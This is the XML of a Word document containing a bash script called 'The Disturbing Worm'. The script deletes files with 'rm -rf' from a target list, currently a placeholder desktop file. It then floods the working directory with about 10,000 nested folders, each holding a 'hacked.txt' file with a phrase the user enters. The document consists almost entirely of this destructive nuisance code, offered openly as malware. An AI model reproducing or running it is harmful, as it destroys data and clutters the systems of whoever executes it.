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4A52" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t># Counter that determines number of repetitions of corruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B4F525" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t># Increase to heat your room.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112D5F9D" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>corruption_counter=101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B9D557" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="383A3323" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t># Target files to be deleted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC898F6" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>targets=("$HOME/desktop/to_be_deleted.txt")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A0E7A3" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CE342FD" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t># Go to the file's current directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758DB787" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>cd "$(dirname "${BASH_SOURCE[0]}")"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C6AB28" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58A0F3C6" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t># Greeting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B4CF64" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>echo -e "\n---- The Disturbing Worm ----\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00850EB7" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B923EBA" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t># Take user input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047D1A8D" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>echo -e "Enter your phase:\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E703BF2" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42B89542" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t># Read user phrase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E42DB25" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>read -r phrase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DDEFF0" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E4A8754" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t># Create the folders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3683C0" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>for ((i = 0; i &lt; corruption_counter; i++)); do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7269153E" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    mkdir "./$i"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4460EA14" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5500D329" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BB1BA31" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t># Iterate over the target list and destroy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C40ABAB" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>for target in "${targets[@]}"; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280665A3" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    rm -rf "$target"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1875DFA1" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D10ECEA" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D5DCD83" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t># Create corruption_counter number of folders and inside each create corruption_counter number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A1E1D8" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t># of folders AND inside of each folder create corruption_counter number of hacked.txt files. LOL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776211B4" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>for ((top_index = 0; top_index &lt; corruption_counter; top_index++)); do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084E185C" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    for ((folder_index = 0; folder_index &lt; corruption_counter; folder_index++)); do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37093F8A" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        # Create intermediate folder and then create hacked.txt file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D75ADC" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        mkdir "./$top_index/$folder_index" &amp;&amp; echo "$phrase" &gt; "./$top_index/$folder_index/hacked.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C59FEE" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509570F6" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101B5ED1" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05113C6A" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t># Goodbye text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014762BD" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>echo "Wrom executed successfully."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA390ED" w14:textId="77777777" w:rsidR="0052289D" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>echo -e "\n---- The Disturbing Worm ----\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025C392B" w14:textId="5FFBAAA4" w:rsidR="006309CB" w:rsidRDefault="0052289D" w:rsidP="0052289D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>exit 0</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0063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9D"/>
    <w:rsid w:val="0052289D"/>
    <w:rsid w:val="006309CB"/>
    <w:rsid w:val="00E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CAEE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{681C6853-E017-4F3A-B35C-1EA35D8A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SirajAldeen</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Yaman SirajAldeen</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-11-28T21:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-28T21:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>